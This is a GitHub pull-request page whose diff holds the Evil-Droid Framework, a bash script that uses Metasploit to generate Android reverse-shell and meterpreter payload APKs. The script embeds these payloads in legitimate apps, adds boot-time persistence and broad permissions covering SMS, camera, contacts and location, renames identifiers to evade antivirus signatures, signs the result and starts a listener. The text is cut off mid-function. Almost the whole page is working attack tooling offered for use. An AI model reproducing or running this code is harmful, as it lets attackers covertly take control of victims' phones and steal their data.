-
Notifications
You must be signed in to change notification settings - Fork 399
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
999 #48
Open
vin999999999
wants to merge
1
commit into
M4sc3r4n0:master
Choose a base branch
from
vin999999999:patch-4
base: master
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
999 #48
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash # # Evil-Droid Framework . version 0.3 # Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platform # # Created By Mascerano Bachir . # Website: http://www.dev-labs.co # YTB : https://www.youtube.com/c/mascerano%20bachir # FCB : https://www.facebook.com/kali.linux.pentesting.tutorials #Speciak thanks to : MrPedroubuntu , Kader Achraf , youcef yahia and Mohammed Yacine # # this is an open source tool if you want to modify or add something . Please give me a copy. # resize terminal window resize -s 40 70 > /dev/null #Colors cyan='\e[0;36m' lightcyan='\e[96m' green='\e[0;32m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' blue='\e[1;34m' Escape="\033"; white="${Escape}[0m"; RedF="${Escape}[31m"; GreenF="${Escape}[32m"; LighGreenF="${Escape}[92m" YellowF="${Escape}[33m"; BlueF="${Escape}[34m"; CyanF="${Escape}[36m"; Reset="${Escape}[0m"; # Check root [[ `id -u` -eq 0 ]] > /dev/null 2>&1 || { echo $red "You must be root to run the script"; echo ; exit 1; } clear # check internet function checkinternet() { ping -c 1 baidu.com > /dev/null 2>&1 if [[ "$?" != 0 ]] then echo -e $yellow " Checking For Internet: ${RedF}SUCSESS" echo echo -e $red "This Script Needs An Active Internet Connection" echo echo -e $red " Enter Evil-Droid " echo && sleep 2 exit else echo -e $yellow " Checking For Internet: ${LighGreenF}CONNECTED" fi } checkinternet sleep 2 #Define options path=`pwd` lanip=`hostname -I` publicip=`dig +short myip.opendns.com @resolver1.opendns.com` ver="v0.3" APKTOOL="$path/tools/apktool.jar" VAR1=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming VAR2=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming VAR3=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Payload.smali renaming VAR4=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 1 VAR5=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 2 VAR6=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 3 VAR7=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'payload' VAR8=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'metasploit' perms=' <uses-permission android:name="android.permission.INTERNET"/>\n <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>\n <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>\n <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>\n <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>\n <uses-permission android:name="android.permission.READ_PHONE_STATE"/>\n <uses-permission android:name="android.permission.SEND_SMS"/>\n <uses-permission android:name="android.permission.RECEIVE_SMS"/>\n <uses-permission android:name="android.permission.RECORD_AUDIO"/>\n <uses-permission android:name="android.permission.CALL_PHONE"/>\n <uses-permission android:name="android.permission.READ_CONTACTS"/>\n <uses-permission android:name="android.permission.WRITE_CONTACTS"/>\n <uses-permission android:name="android.permission.WRITE_SETTINGS"/>\n <uses-permission android:name="android.permission.CAMERA"/>\n <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>\n <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>\n <uses-permission android:name="android.permission.SET_WALLPAPER"/>\n <uses-permission android:name="android.permission.READ_CALL_LOG"/>\n <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>\n <uses-permission android:name="android.permission.WAKE_LOCK"/>\n <uses-permission android:name="android.permission.READ_SMS"/>' echo "" sleep 1 # spinner for Metasploit Generator spinlong () { bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" barlength=${#bar} i=0 while ((i < 100)); do n=$((i*barlength / 100)) printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}" ((i += RANDOM%5+2)) sleep 0.02 done } # detect ctrl+c exiting trap ctrl_c INT ctrl_c() { clear echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit... " echo -e $red"[*] Stopping Services... " apache_svc_stop postgresql_stop sleep 1 echo "" echo -e $yellow"[*] Thanks For Using Evil-Droid :)" exit } #detect system echo -e $blue sudo cat /etc/issue.net #check dependencies existence echo -e $blue "" echo "® Checking dependencies configuration ®" echo " " # check if metasploit-framework is installed which msfconsole > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Metasploit-Framework..............${LighGreenF}[ found ]" which msfconsole > /dev/null 2>&1 sleep 2 else echo -e $red "[ X ] Metasploit-Framework -> ${RedF}not found " echo -e $yellow "[ ! ] Installing Metasploit-Framework " sudo apt-get install metasploit-framework -y echo -e $blue "[ ✔ ] Done installing ...." which msfconsole > /dev/null 2>&1 sleep 2 fi #check if xterm is installed which xterm > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Xterm.............................${LighGreenF}[ found ]" which xterm > /dev/null 2>&1 sleep 2 else echo "" echo -e $red "[ X ] xterm -> ${RedF}not found! " sleep 2 echo -e $yellow "[ ! ] Installing Xterm " sleep 2 echo -e $green "" sudo apt-get install xterm -y clear echo -e $blue "[ ✔ ] Done installing .... " which xterm > /dev/null 2>&1 fi #check if zenity is installed which zenity > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Zenity............................${LighGreenF}[ found ]" which zenity > /dev/null 2>&1 sleep 2 else echo "" echo -e $red "[ X ] Zenity -> ${RedF}not found! " sleep 2 echo -e $yellow "[ ! ] Installing Zenity " sleep 2 echo -e $green "" sudo apt-get install zenity -y clear echo -e $blue "[ ✔ ] Done installing .... " which zenity > /dev/null 2>&1 fi #Check for Android Asset Packaging Tool which aapt > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Aapt..............................${LighGreenF}[ found ]" which aapt > /dev/null 2>&1 sleep 2 else echo "" echo -e $red "[ X ] Aapt -> ${RedF}not found! " sleep 2 echo -e $yellow "[ ! ] Installing Aapt " sleep 2 echo -e $green "" sudo apt-get install aapt -y sudo apt-get install android-framework-res -y clear echo -e $blue "[ ✔ ] Done installing .... " which aapt > /dev/null 2>&1 fi #Check for Apktool Reverse Engineering which apktool > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Apktool...........................${LighGreenF}[ found ]" which aapt > /dev/null 2>&1 sleep 2 else echo "" echo -e $red "[ X ] Apktool -> ${RedF}not found! " sleep 2 echo -e $yellow "[ ! ] Installing Apktool " sleep 2 echo -e $green "" sudo apt-get install apktool -y clear echo -e $blue "[ ✔ ] Done installing .... " which apktool > /dev/null 2>&1 fi #check for zipalign which zipalign > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Zipalign..........................${LighGreenF}[ found ]" which aapt > /dev/null 2>&1 sleep 2 else echo "" echo -e $red "[ X ] Zipalign -> ${RedF}not found! " sleep 2 echo -e $yellow "[ ! ] Installing Zipalign " sleep 2 echo -e $green "" sudo apt-get install zipalign -y clear echo -e $blue "[ ✔ ] Done installing .... " which zipalign > /dev/null 2>&1 fi directory="$path/evilapk" if [ ! -d "$directory" ]; then echo "Creating the output directory..." mkdir $directory sleep 3 fi echo -e $red "╔────────────────────────────────────────────────╗" echo -e $red "| Evil-Droid Framework $ver - Dev-labs.co |" echo -e $red "| Please do not upload APK to VirusTotal.com |" echo -e $red "┖────────────────────────────────────────────────┙" #function ascii banner function print_ascii_art { echo -e $lightgreen " . . " echo -e $lightgreen " M. .M " echo -e $lightgreen " MMMMMMMMMMM. " echo -e $lightgreen " .MMM\MMMMMMM/MMM. " echo -e $lightgreen " .MMM.7MMMMMMM.7MMM. " echo -e $lightgreen " .MMMMMMMMMMMMMMMMMMM " echo -e $lightgreen " MMMMMMM.......MMMMMMM " echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM " echo -e $lightgreen " MMMM MMMMMMMMMMMMMMMMMMMMM MMMM " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD " echo -e $lightgreen " MMM8 MMMMMMMMMMMMMMMMMMMMM 8MMM " echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM " echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM " echo -e $lightgreen " MMMMM MMMMM $ver " echo -e $lightgreen " MMMMM MMMMM " echo -e $lightgreen " MMMMM MMMMM " echo -e $lightgreen " MMMMM MMMMM " echo -e $lightgreen " .MMM. .MMM. " echo -e $lightgreen " Mascerano Bachir - Dev-labs " } #function lhost function get_lhost() { LHOST=$(zenity --title="☢ SET LHOST ☢" --text "Your-Local-ip: $lanip ; Your-Public-ip: $publicip" --entry-text "$lanip" --entry --width 300 2> /dev/null) } #function lport function get_lport() { LPORT=$(zenity --title="☢ SET LPORT ☢" --text "example: 4444" --entry-text "4444" --entry --width 300 2> /dev/null) } #function payload function get_payload() { PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter_reverse_tcp" FALSE "android/meterpreter_reverse_http" FALSE "android/meterpreter_reverse_https" --width 400 --height 400 2> /dev/null) } function get_payload1() { PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" --width 400 --height 400 2> /dev/null) } #function name function payload_name() { apk_name=$(zenity --title "☢ PAYLOAD NAME ☢" --text "example: evilapk" --entry --entry-text "evilapk" --width 300 2> /dev/null) } #function original apk function orig_apk() { orig=$(zenity --title "☢ ORIGINAL APK ☢" --filename=$path --file-selection --file-filter "*.apk" --text "chose the original (apk)" 2> /dev/null) } #function change icon function change_icon() { iconos=$(zenity --title "☢ CHOOSE ICON ☢" --filename=$path --file-selection --file-filter "*.png" --text "chose your own icon." 2> /dev/null) } #function generate payload function gen_payload() { echo -e $yellow "" echo "[*] Generating apk payload" spinlong xterm -T " GENERATE APK PAYLOAD" -e msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1 } function embed_payload() { echo -e $yellow "" echo "[*] Embeding apk payload in orginal apk" spinlong xterm -T " EMBED APK PAYLOAD" -e msfvenom -x $orig -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1 } #function update apktool function up_apktook() { echo -e $yellow "" echo "[*] Removing 1.apk framework file..." spinlong apktool empty-framework-dir --force > /dev/null 2>&1 } #function apktool function apk_decomp() { echo -e $yellow "" echo "[*] Decompiling Payload APK..." spinlong xterm -T "Decompiling Payload" -e java -jar $APKTOOL d -f -o $path/payload $path/$apk_name.apk > /dev/null 2>&1 rm $apk_name.apk } function apk_comp() { echo -e $yellow "" echo "[*] Rebuilding APK file..." spinlong xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/payload -o evil.apk > /dev/null 2>&1 rm -r payload > /dev/null 2>&1 } function apk_decomp1() { echo -e $yellow "" echo "[*] Decompiling Original APK..." spinlong xterm -T "Decompiling Original" -e java -jar $APKTOOL d -f -o $path/original $orig > /dev/null 2>&1 } function apk_comp1() { echo -e $yellow "" echo "[*] Rebuilding Backdoored APK..." spinlong xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/original -o evil.apk > /dev/null 2>&1 rm -r payload > /dev/null 2>&1 rm -r original > /dev/null 2>&1 } #function errors function error() { rc=$? if [ $rc != 0 ]; then echo -e $red "" echo "【X】 Failed to rebuild backdoored apk【X】" echo apache_svc_stop postgresql_stop exit $rc fi } function error0() { rc=$? if [ $rc != 0 ]; then echo -e $red "" echo "【X】 An Error Was Occured .Ty Again【X】" echo apache_svc_stop postgresql_stop exit $rc fi } #function apache2 service function apache_svc_start() { service apache2 start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1 } function apache_svc_stop() { service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1 } #function postgresql service function postgresql_start() { service postgresql start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1 } function postgresql_stop() { service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1 } # function adding permission function perms() { echo -e $yellow "" echo "[*] Adding permission and Hook Smali" spinlong package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'` 2>&1 package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'` 2>&1 tmp=$package_name sed -i "5i\ $perms" $path/original/AndroidManifest.xml rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1 sed -i "s|Lcom/metasploit|L$package_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1 cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$package_name > /dev/null 2>&1 rc=$? if [ $rc != 0 ];then app_name=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'` 2>&1 app_dash=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'` 2>&1 tmp=$app_name sed -i "s|L$package_name|L$app_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1 cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$app_name > /dev/null 2>&1 amanifest=" </application>" boot_cmp=' <receiver android:label="MainBroadcastReceiver" android:name="'$app_dash.stage.MainBroadcastReceiver'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$app_dash.stage.MainService'"/></application>' sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1 fi amanifest=" </application>" boot_cmp=' <receiver android:label="MainBroadcastReceiver" android:name="'$package_dash.stage.MainBroadcastReceiver'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$package_dash.stage.MainService'"/></application>' sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1 android_nam=$tmp } # functions hook smali function hook_smalies() { launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1 android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 if [ $android_name ]; then echo echo "##################################################################" echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1 elif [ ! -e $android_activity ]; then echo echo "##################################################################" echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1 rc=$? if [ $rc != 0 ]; then spinlong echo -e $red "" echo "[x] cant find : $android_activity.smali" echo "[*] try another ..." spinlong sleep 2 echo echo "##################################################################" echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1 fi fi } #function flagged by av & updating smalies function flagg() { echo -e $yellow "" echo "[*] Scrubbing the payload contents to avoid AV signatures..." spinlong mv payload/smali/com/metasploit payload/smali/com/$VAR1 mv payload/smali/com/$VAR1/stage payload/smali/com/$VAR1/$VAR2 mv payload/smali/com/$VAR1/$VAR2/Payload.smali payload/smali/com/$VAR1/$VAR2/$VAR3.smali sleep 2 if [ -f payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then echo echo -e $red "[ X ] an error was occured . Please upgrade your distro .." apache_svc_stop postgresql_stop exit 1 fi sed -i "s#/metasploit/stage#/$VAR1/$VAR2#g" payload/smali/com/$VAR1/$VAR2/* sed -i "s#Payload#$VAR3#g" payload/smali/com/$VAR1/$VAR2/* sed -i "s#com.metasploit.meterpreter.AndroidMeterpreter#com.$VAR4.$VAR5.$VAR6#" payload/smali/com/$VAR1/$VAR2/$VAR3.smali sed -i "s#payload#$VAR7#g" payload/smali/com/$VAR1/$VAR2/$VAR3.smali sed -i "s#com.metasploit.stage#com.$VAR1.$VAR2#" payload/AndroidManifest.xml sed -i "s#metasploit#$VAR8#" payload/AndroidManifest.xml sed -i "s#MainActivity#$apk_name#" payload/res/values/strings.xml sed -i '/.SET_WALLPAPER/d' payload/AndroidManifest.xml sed -i '/WRITE_SMS/a<uses-permission android:name="android.permission.SET_WALLPAPER"/>' payload/AndroidManifest.xml } function flagg_original() { echo -e $yellow "" echo "[*] Scrubbing the payload contents to avoid AV signatures..." spinlong rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1 mv payload/smali/com/metasploit/stage payload/smali/com/metasploit/$VAR1 mv payload/smali/com/metasploit/$VAR1/MainBroadcastReceiver.smali payload/smali/com/metasploit/$VAR1/$VAR2.smali mv payload/smali/com/metasploit/$VAR1/MainService.smali payload/smali/com/metasploit/$VAR1/$VAR3.smali mv payload/smali/com/metasploit/$VAR1/Payload.smali payload/smali/com/metasploit/$VAR1/$VAR4.smali sleep 2 if [ -f payload/smali/com/metasploit/$VAR1/PayloadTrustManager.smali ]; then echo echo -e $red "[ X ] an error was occured . Please upgrade your distro .." apache_svc_stop postgresql_stop exit 1 fi echo -e $yellow "" echo "[*] Adding permission and Hook Smali" spinlong sed -i "5i\ $perms" $path/original/AndroidManifest.xml package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'` 2>&1 package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'` 2>&1 tmp=$package_name sed -i "s|Lcom/metasploit/stage|L$package_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$package_name/$VAR1/Payload|L$package_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$package_name/$VAR1/MainService|L$package_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$package_name/$VAR1/MainBroadcastReceiver|L$package_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$package_name > /dev/null 2>&1 rc=$? if [ $rc != 0 ];then app_name=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'` 2>&1 app_dash=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'` 2>&1 tmp=$app_name sed -i "s|L$package_name/$VAR1|L$app_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$app_name/$VAR1/$VAR4|L$app_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$app_name/$VAR1/$VAR3|L$app_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 sed -i "s|L$app_name/$VAR1/$VAR2|L$app_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1 cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$app_name > /dev/null 2>&1 amanifest=" </application>" boot_cmp=' <receiver android:label="'$VAR2'" android:name="'$app_dash.$VAR1.$VAR2'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$app_dash.$VAR1.$VAR3'"/></application>' sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1 fi amanifest=" </application>" boot_cmp=' <receiver android:label="'$VAR2'" android:name="'$package_dash.$VAR1.$VAR2'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$package_dash.$VAR1.$VAR3'"/></application>' sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1 android_nam=$tmp launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1 android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1 if [ $android_name ]; then echo echo "##################################################################" echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1 elif [ ! -e $android_activity ]; then echo echo "##################################################################" echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1 rc=$? if [ $rc != 0 ]; then spinlong echo -e $red "" echo "[x] cant find : $android_activity.smali" echo "[*] try another ..." spinlong sleep 2 echo echo "##################################################################" echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }' hook_num=`grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1 echo "In line:$hook_num" echo "##################################################################" starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V" sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1 fi fi } # function chage name and icon function merge_name_ico() { echo -e $yellow "" echo "[*] Changing name and icon payload..." spinlong label=' <application android:label="@string/app_name">' label1=' <application android:label="@string/app_name" android:icon="@drawable/main_icon">' sed -i "s|$label|$label1|g" $path/payload/AndroidManifest.xml 2>&1 sed -i "s|MainActivity|$apk_name|g" $path/payload/res/values/strings.xml 2>&1 mkdir $path/payload/res/drawable cp $iconos $path/payload/res/drawable/main_icon.png } #function signing apk function sign() { echo -e $yellow "" echo "[*] Checking for ~/.android/debug.keystore for signing..." spinlong if [ ! -f ~/.android/debug.keystore ]; then echo -e $red "" echo " [ X ] Debug key not found. Generating one now..." spinlong if [ ! -d "~/.android" ]; then mkdir ~/.android > /dev/null 2>&1 fi echo -e $lightgreen "" keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000 fi spinlong echo -e $yellow "" echo "[*] Attempting to sign the package with your android debug key" spinlong jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA evil.apk androiddebugkey > /dev/null 2>&1 echo -e $yellow echo "[*] Verifying signed artifacts..." spinlong jarsigner -verify -certs evil.apk > /dev/null 2>&1 rc=$? if [ $rc != 0 ]; then echo -e $red "" echo "[!] Failed to verify signed artifacts" apache_svc_stop postgresql_stop exit $rc fi echo -e $yellow echo "[*] Aligning recompiled APK..." spinlong zipalign 4 evil.apk $apk_name.apk 2>&1 rc=$? echo -e $yellow echo "[✔] Done." spinlong if [ $rc != 0 ]; then echo -e $red "" echo "[!] Failed to align recompiled APK" apache_svc_stop postgresql_stop exit $rc fi rm evil.apk > /dev/null 2>&1 } #function ask function quests() { while true; do echo "" quest=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose payload apk or original apk?" --radiolist --column "Choose" --column "Option" TRUE "APK-MSF" FALSE "ORIGINAL-APK" --width 305 --height 270 2> /dev/null) case $quest in APK-MSF) change_icon;spinlong;gen_payload;spinlong;apk_decomp;flagg;merge_name_ico;spinlong;apk_comp;spinlong;sign;return;; ORIGINAL-APK) orig_apk;spinlong;gen_payload;spinlong;up_apktook;apk_decomp1;spinlong;apk_decomp;flagg_original;spinlong;apk_comp1;spinlong;sign;return;; esac done } #function listeners function listener() { xterm -T "EVIL-DROID MULTI/HANDLER" -fa monaco -fs 10 -bg black -e "msfconsole -x 'use multi/handler; set LHOST $lanip; set LPORT $LPORT; set PAYLOAD $PAYLOAD; exploit'" } #function clone site function clns() { 